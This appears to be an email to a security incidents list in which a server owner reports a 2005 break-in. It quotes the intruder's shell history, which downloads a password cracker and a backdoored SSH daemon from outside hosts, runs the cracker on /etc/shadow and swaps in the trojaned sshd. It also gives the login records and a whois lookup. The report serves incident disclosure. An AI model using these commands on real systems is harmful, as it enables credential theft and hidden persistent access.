From: steve@example.org
To: incidents@securityfocus.com
Subject: SSH compiled with backdoor

Hi!

One of my web servers was hacked on July 17, 2005. bash_history
showed:

w
wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf
john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd
../run;./john /etc/shadow
wget www.geocities.com/securedro/sshd.tar.gz;tar -xzf sshd.tar.gz;rm
-rf sshd.tar.gz;cd sshd;cd apps/ssh
pico genx.h
pico genx.h
pico ssh2includes.h
cd ../..
./configure --without-x
make
make install
mkdir /lib/java
cp /usr/sbin/sshd a
mv a /lib/java
rm -rf /usr/sbin/sshd
cp /usr/local/sbin/sshd /usr/sbin
/etc/rc.d/init.d/sshd restart
/etc/rc.d/init.d/ssh restart
locate init.d
/etc/init.d/sshd restart
w
reboot

According to john, a couple of users had weak passwords, but root
seemed well protected. From looking in all the bash_history, it appears the
hacker came in from the website account, and did an su from there.

I found this about a month later when I logged into the box, did an ls,
only to be met by a seg fault. A ps x showed mech.tgz trying to be
downloaded, and a bunch of other CRON processes running. The auth log
didn't show other logins, though, so the ssh installed must have logging
turned off for the backdoor they installed.

I filled out an abuse form at geocities for the accounts hosting the
software after downloading the software (I couldn't find the tgz files on
my system).

Last showed:
reboot system boot 2.4.18-bf2.4 Sun Jul 17 18:15
(37+11:47)
website pts/0 193.231.77.74 Sun Jul 17 17:42 - down
(00:27)
website pts/1 193.231.77.74 Sun Jul 17 17:05 - 17:26
(00:20)
website pts/0 211.43.207.169 Sun Jul 17 16:26 - 17:41
(01:14)

whois says:
inetnum: 193.231.77.0 - 193.231.77.255
netname: DATANET-RO
descr: Starnets - Datanet
country: RO
address: DATA NET
address: Str. Ioan N. Roman Nr. 13
address: Constanta, cod 900199, ROMANIA

Best Regards,

Steve


----------------